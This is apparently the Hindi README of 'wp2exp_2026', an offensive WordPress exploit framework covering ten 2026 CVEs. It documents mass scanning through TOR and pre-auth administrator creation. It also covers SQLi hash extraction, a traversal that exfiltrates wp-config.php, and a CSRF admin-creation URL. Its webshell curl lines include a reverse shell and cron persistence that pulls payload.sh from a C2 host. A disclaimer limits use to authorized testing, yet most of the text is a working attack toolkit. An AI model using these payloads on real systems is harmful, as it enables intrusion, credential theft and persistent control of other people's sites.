
WordPress All-in-One Exploit Framework — डिटेक्टर, स्कैनर, एन्यूमरेटर, एक्सप्लॉइट, एस्केलेशन। 2026-08 वेव के 10 CVE, जिनमें CVE-2026-63030 (wp2shell) शामिल है।
WordPress ऑल-इन-वन एक्सप्लॉइट फ्रेमवर्क — डिटेक्टर · स्कैनर · एन्यूमरेटर · एक्सप्लॉइट · एस्केलेशन
wp2exp_2026 wp2shell फ्रेमवर्क का रीब्रांडेड, युद्ध-परीक्षित उत्तराधिकारी है। यह मूल wp2shell चेकर/एक्सप्लॉइट चेन, तीन सार्वजनिक CVE-2026-63030 PoC किट (Ch4120N, shinthink, SentinelX), और TOR डार्कवेब-इंटेल पाइपलाइन के माध्यम से NVD / GitHub Advisories / CISA KEV से स्क्रेप की गई अगस्त 2026 की WordPress CVE वेव — को एक स्क्रिप्ट में विलीन करता है जो टारगेट को निष्क्रिय फ़िंगरप्रिंटिंग से लेकर सत्यापित वेबशेल तक ले जाती है।
┌──────────┐ ┌──────────┐ ┌───────────┐ ┌───────────┐ ┌──────────┐
│ DETECTOR │ -> │ SCANNER │ -> │ ENUMERATOR│ -> │ EXPLOIT │ -> │ ESCALATE │
│ 10 CVEs │ │ version/ │ │ users/ │ │ admin │ │ webshell │
│ probes │ │ WAF/XMLRPC│ │ plugins │ │ create/ │ │ rev shell │
└──────────┘ └──────────┘ └───────────┘ └───────────┘ └──────────┘
⚠️ केवल अधिकृत परीक्षण।
scanमोड गैर-विनाशकारी है। एक्सप्लॉइटेशन मोड को स्पष्ट रूप से--modeकी आवश्यकता होती है। हर टारगेट के लिए लिखित अनुमति प्राप्त करना आपकी ज़िम्मेदारी है।
# Clone
git clone https://github.com/rechandra/wp2exp-2026.git
cd wp2exp-2026
# Dependencies: Python 3.8+ standard library only.
# Optional: PySocks for SOCKS5/TOR proxying
pip install pysocks
कोई API कुंजी नहीं, कोई डेटाबेस नहीं, कोई कंपाइलेशन नहीं।
# 1. Safe scan of one target (detector + scanner + enumerator)
python3 wp2exp_2026.py https://target.com
# 2. Same scan, but fire exploitation (admin creation + content dumps)
python3 wp2exp_2026.py https://target.com --mode exploit
# 3. Full chain to a verified webshell
python3 wp2exp_2026.py https://target.com --mode shell
# 4. Mass scan a file of targets
python3 wp2exp_2026.py -f targets.txt --threads 10
# 5. Anonymous scanning through TOR
python3 wp2exp_2026.py https://target.com --proxy socks5h://127.0.0.1:9050
usage: wp2exp_2026.py [-h] [targets ...] [-f FILE] [--mode {scan,exploit,shell}]
[--shell {mini,full}] [--mapster-dump N] [--proxy PROXY]
[--timeout N] [--threads N] [--json] [-o OUTPUT]
scan — डिटेक्टर + स्कैनर + एन्यूमरेटर (सुरक्षित)गैर-विनाशकारी। किसी भी टारगेट पर पहले इसका उपयोग करें।
यह क्रम से क्या करता है:
उदाहरण:
python3 wp2exp_2026.py https://example.com
# outputs: version, WAF, XMLRPC, users, plugin versions, per-CVE verdicts
exploit — स्कैन + एक्सप्लॉइटेशनscan में सब कुछ, साथ ही:
उदाहरण:
# Scan + create admin + dump 200 post IDs through Mapster
python3 wp2exp_2026.py https://example.com --mode exploit --mapster-dump 200
--verify — पर्यावरण स्व-जाँचकिसी भी स्कैन से पहले रनटाइम को मान्य करता है: Python ≥3.8, PySocks उपलब्धता (SOCKS5/TOR), प्रॉक्सी पहुँच (यदि --proxy सेट है), CVE मैट्रिक्स अखंडता, वर्जन-पार्सर शुद्धता।
python3 wp2exp_2026.py --verify
python3 wp2exp_2026.py --verify --proxy socks5h://127.0.0.1:9050
shell — वेबशेल तक पूरी चेनexploit में सब कुछ, साथ ही एस्केलेशन: यदि एडमिन निर्माण सफल होता है, तो स्क्रिप्ट:
wp-login.php में लॉगिन करती है (कुकी जार)_wpnonce + सक्रिय थीम निकालती है → admin-ajax.php?action=edit-theme-plugin-file के माध्यम से वेबशेल लिखती हैupdate.php?action=upload-plugin के माध्यम से अपलोड करता है, इसे सक्रिय करता हैid निष्पादित करके सत्यापित करता है — लाइव कमांड आउटपुट प्रिंट करता हैवेबशेल प्रकार (--shell):
उदाहरण:
python3 wp2exp_2026.py https://example.com --mode shell --shell full --sqli-info
python3 wp2exp_2026.py --verify
# -> ADMIN CREATED: wp_xxxx / Wp!yyyy
# -> WEBSHELL: https://example.com/wp-content/themes/twentytwentyfive/.wp-abc123.php?k=KEY&c=id
# -> verify: uid=33(www-data) ...
सफल रन के बाद मैनुअल शेल उपयोग:
# Command execution (mini)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&c=id'
# Full shell — file upload
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=upload&f=/tmp/pwned.txt&d=<base64>'
# Full shell — reverse shell (listener: nc -lvnp PORT)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=rev&h=YOUR_IP&p=4444'
# Full shell — cron persistence (curl piped to sh from your C2)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=persist&u=https://c2.example/payload.sh'
DELETE /wp-json/formgent/v1/responses/attachments?file_token=<base64("formgent/YYYY/MM/FILE")> — रूट ऑथ मिडलवेयर के बिना पंजीकृत है; टोकन सापेक्ष पथ का रॉ base64 है (जाली बनाने योग्य)। फिक्स्ड संस्करण हस्ताक्षरित UploadFileToken का उपयोग करते हैं।reauth_for_authorize ने क्वेरी स्ट्रिंग सहित REQUEST_URI के विरुद्ध सबस्ट्रिंग परीक्षण के साथ /mcp/v1/oauth/authorize का मिलान किया। कुकी उपयोगकर्ता की पूर्ण पहचान पुनर्स्थापित करने के लिए किसी भी REST अनुरोध में &x=/mcp/v1/oauth/authorize जोड़ें। क्लासिक CSRF: crafted URL पर जाने वाला एडमिन एक हमलावर खाता बनाता है।
https://T/wp-json/wp/v2/users?_method=POST&x=/mcp/v1/oauth/authorize&username=csrf_admin&password=...&roles=administrator
wpcf7_verify_nonce => __return_true सेट करता है → CF7 सबमिशन को कोई nonce नहीं चाहिए; ../../../../wp-config.php युक्त फ़ाइल फ़ील्ड सबमिट करें और इंटीग्रेशन एक्शन (वेबहुक/ईमेल) फ़ाइल को बाहर निकालता है।यह स्क्रिप्ट TOR डार्कवेब-इंटेल पाइपलाइन (NVD ताज़ा-CVE स्क्रेप, GitHub Advisories, CISA KEV) द्वारा एकत्रित खुफिया जानकारी से बनाई गई है और अनाम स्कैनिंग का समर्थन करती है:
# Scan through TOR (requires tor daemon on 9050)
python3 wp2exp_2026.py https://target.onion --proxy socks5h://127.0.0.1:9050
python3 wp2exp_2026.py -f targets.txt --proxy socks5h://127.0.0.1:9050 --threads 5
# Verify your exit node
# (script's Http layer reports IsTor:true when routing through TOR)
सत्यापित व्यवहार: प्रॉक्सी प्लंबिंग check.torproject.org/api/ip के विरुद्ध पुष्टि की गई → एग्ज़िट 192.42.116.45 के माध्यम से {"IsTor":true}।
# Console: colored per-stage verdicts + final summary table
# JSON report to file (always includes raw responses for evidence)
python3 wp2exp_2026.py https://example.com --mode shell -o report.json
# Full JSON to stdout for piping into jq / your own tooling
python3 wp2exp_2026.py https://example.com --json | jq '.[0].cve_checks'
रिपोर्ट संरचना:
{
"target": "https://example.com",
"version": "7.0.1",
"waf": "Cloudflare",
"xmlrpc": true,
"users": [{"id": 1, "name": "admin", "slug": "admin"}],
"plugins": [{"slug": "formgent", "version": "1.9.2", "vulnerable": true}],
"core_wp2shell": {"verdict": "VULNERABLE", "endpoint": ".../wp-json/batch/v1"},
"cve_checks": {"CVE-2026-3141": {"vulnerable": true, "detail": "..."}},
"exploitation": {
"wp2shell_admin": {"success": true, "username": "...", "password": "..."},
"shell": {"success": true, "shell_url": "...", "key": "..."},
"mapster_posts": [...]
}
}
2026-08-04 को एक अनुकरणित कमज़ोर WordPress लैब के विरुद्ध मान्य किया गया — QA बैटरी: 32/32 जाँचें PASS (सभी मोड, JSON शुद्धता, मल्टी-टारगेट, बेयर-होस्ट सामान्यीकरण, mapster ड्राफ्ट/प्राइवेट लीक, db संस्करण + एडमिन हैश का SQLi निष्कर्षण, पूर्ण शेल चेन):
wp2shell (CVE-2026-63030): VULNERABLE
ADMIN CREATED: wp_7ytp1 / Wp!s6d2yz28qiey
WEBSHELL: .../twentytwentyfive/.wp-cg93vk.php?k=...&c=id
verify: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Mapster (CVE-2026-14839): dumped draft + private posts
FormGent (CVE-2026-3141): unauth DELETE route confirmed
TOR: IsTor:true exit 192.42.116.45
exploit मोड में वायर्ड (--sqli-info)--verify पर्यावरण स्व-जाँचdarkweb_intel.py आउटपुट से CVE मैट्रिक्स का स्वतः-रीफ़्रेशPR स्वागत योग्य हैं। पेलोड को डिफ़ॉल्ट रूप से गैर-विनाशकारी रखें।
MIT. केवल अधिकृत एंगेजमेंट। उन परिसंपत्तियों के विरुद्ध --mode exploit / --mode shell कभी न चलाएँ जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास लिखित अनुमति नहीं है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।
| तर्क | डिफ़ॉल्ट | विवरण |
|---|
targets | — | एक या अधिक बेस URL (https://site.com या सादा site.com) |
-f, --file | — | प्रति पंक्ति एक टारगेट वाली फ़ाइल (# टिप्पणियाँ अनुमत) |
--mode | scan | scan = केवल डिटेक्ट · exploit = स्कैन + एक्सप्लॉइटेशन · shell = स्कैन + एक्सप्लॉइट + वेबशेल |
--shell | mini | वेबशेल प्रकार: mini (वन-लाइनर exec) या full (फ़ाइल प्रबंधन / डाउनलोड / रिवर्स शेल / cron स्थिरता) |
--mapster-dump | 0 | CVE-2026-14839 के माध्यम से N पोस्ट ID डंप करें (0 = अक्षम) |
--sqli-info | off | SQLi के माध्यम से db_version / siteurl / एडमिन पासवर्ड हैश / टेबल प्रीफ़िक्स निकालें (CVE-2026-60137) |
--verify | off | पर्यावरण स्व-जाँच (python, PySocks, प्रॉक्सी पहुँच, CVE मैट्रिक्स, वर्जन पार्सर) और बाहर निकलें |
--proxy | — | HTTP प्रॉक्सी या SOCKS5: socks5h://127.0.0.1:9050 (TOR) |
--timeout | 15 | प्रति-अनुरोध टाइमआउट (सेकंड) |
--threads | 5 | समानांतर टारगेट (केवल एकाधिक टारगेट / -f के साथ उपयोग होता है) |
--json | — | stdout पर मशीन-पठनीय JSON रिपोर्ट प्रिंट करें |
-o, --output | — | पूरी JSON रिपोर्ट फ़ाइल में लिखें |
| # | चरण | जाँच |
|---|
| 1 | फ़िंगरप्रिंट | WordPress संस्करण /feed/ जनरेटर, /readme.html, मेटा जनरेटर, REST API जनरेटर के माध्यम से — यदि संस्करण wp2shell कमज़ोर रेंज (6.9.0–6.9.4, 7.0.0–7.0.1) के भीतर आता है तो फ़्लैग करता है |
| 2 | WAF डिटेक्ट | हेडर + बॉडी मार्कर से Cloudflare / Sucuri / Akamai / AWS WAF / Imperva / Wordfence / F5 |
| 3 | XMLRPC | system.listMethods प्रोब → मल्टीकॉल ब्रूट-फ़ोर्स और पिंगबैक SSRF सतह को फ़्लैग करता है |
| 4 | यूज़र एन्यूमरेशन | REST /wp-json/wp/v2/users + ?rest_route= फ़ॉलबैक + ऑथर आर्काइव (?author=N) |
| 5 | प्लगइन एन्यूमरेशन | सभी 8 ट्रैक किए गए प्लगइन्स के लिए readme.txt Stable tag — CVE मैट्रिक्स के विरुद्ध कमज़ोर संस्करणों को फ़्लैग करता है |
| 6 | wp2shell प्रोब | सुरक्षित batch desync प्रोब (CVE-2026-63030) — एक गैर-मौजूद श्रेणी को malformed primer + benign DELETE भेजता है; handler-hijack मार्कर (parse_path_failed, block_cannot_read, rest_batch_not_allowed) देखता है |
| 7 | CVE जाँच | सभी 10 CVE के लिए लाइव व्यवहारिक प्रोब + संस्करण जाँच (नीचे तालिका देखें) |
| एक्सप्लॉइट | शर्त | क्या होता है |
|---|
| प्री-ऑथ एडमिन निर्माण | wp2shell VULNERABLE | प्रयास 1: batch route-confusion पेलोड roles:["administrator"] के साथ POST /wp/v2/users पहुँचाता है। प्रयास 2 (फ़ॉलबैक): SQLi oEmbed कैश-पॉइज़निंग चेन (shinthink) — oEmbed कैश को हाईजैक करने और एडमिन बनाने के लिए customize_changeset में union-inject करता है। सफलता पर username / password प्रिंट करता है |
| SQLi जानकारी निष्कर्षण | --sqli-info | Error/union-आधारित निष्कर्षण (CVE-2026-60137): db_version, siteurl, पहला एडमिन user_pass हैश, टेबल प्रीफ़िक्स |
| Mapster सामग्री डंप | --mapster-dump N | /wp-json/mapster-wp-maps/feature?id=N के माध्यम से पोस्ट ID 1..N की गणना करता है, draft / pending / private / trashed पोस्ट शीर्षक + पूरी सामग्री एकत्र करता है (CVE-2026-14839) |
| प्रकार | विशेषताएँ |
|---|
mini | ?k=KEY&c=COMMAND → सादा-पाठ कमांड आउटपुट |
full | a=cmd exec · a=upload फ़ाइल लेखन (b64) · a=download फ़ाइल पठन · a=rev रिवर्स शेल (h=HOST&p=PORT) · a=persist crontab स्थिरता (u=URL) · डिफ़ॉल्ट phpinfo() |
| CVE | लक्ष्य | CVSS | वर्ग | डिटेक्शन | एक्सप्लॉइटेशन |
|---|
| CVE-2026-63030 | WP Core 6.9.0–6.9.4, 7.0.0–7.0.1 | 9.8 | REST बैच रूट कन्फ़्यूज़न → RCE | ✅ desync मार्कर प्रोब | ✅ एडमिन निर्माण + शेल |
| CVE-2026-60137 | WP Core (same range) | 5.9 | author__not_in SQLi | ✅ संस्करण + मार्कर | ✅ 63030 चेन के माध्यम से |
| CVE-2026-3141 | FormGent ≤ 1.9.2 | 9.1 | अनऑथ मनमाना फ़ाइल विलोपन | ✅ लाइव DELETE प्रोब | ✅ जाली-योग्य b64 file_token |
| CVE-2026-13596 | Participants DB < 2.7.8.4 | 9.1 | अनऑथ SQLi (सूची खोज) | ✅ एरर-लीक प्रोब | ⚠️ मैनुअल (ब्लाइंड) |
| CVE-2026-15414 | Subscriptions for WooCommerce ≤ 2.0.0 | 8.8 | Priv-esc _wps_plan_user_role | ✅ संस्करण | ✅ चेन दस्तावेज़ |
| CVE-2026-15988 | AI Engine ≤ 3.6.5 | 8.8 | CSRF → एडमिन निर्माण | ✅ नेमस्पेस प्रोब | ✅ PoC URL जनरेटर |
| CVE-2026-15450 | Nex Forms Lite ≤ 9.2.3 | 8.1 | ऑथ मनमाना फ़ाइल विलोपन | ✅ संस्करण | ✅ चेन दस्तावेज़ |
| CVE-2026-15006 | Bit Integrations ≤ 2.9.0 | 7.5 | अनऑथ ट्रैवर्सल (CF7 nonce बायपास) | ✅ संस्करण | ✅ चेन दस्तावेज़ |
| CVE-2026-14839 | Mapster WP Maps < 1.24.0 | 7.5 | अनऑथ प्राइवेट/ड्राफ्ट पोस्ट डंप | ✅ लाइव प्रोब | ✅ --mapster-dump |
| CVE-2026-15052 | MailChimp Subscribe ≤ 4.3.3 | 7.2 | अनऑथ स्टोर्ड XSS | ✅ संस्करण | ✅ चेन दस्तावेज़ |
insert_record() हमलावर-प्रभावित फ़ाइल location संग्रहीत करता है, फिर delete_file() बिना किसी realpath()/अनुमतिसूची सत्यापन के unlink($file) कॉल करता है।save_meta_boxes() $_POST से _wps_plan_user_role स्थायी रूप से सहेजता है; केवल sanitize_key() + is_role() लागू होते हैं — दोनों administrator स्वीकार करते हैं।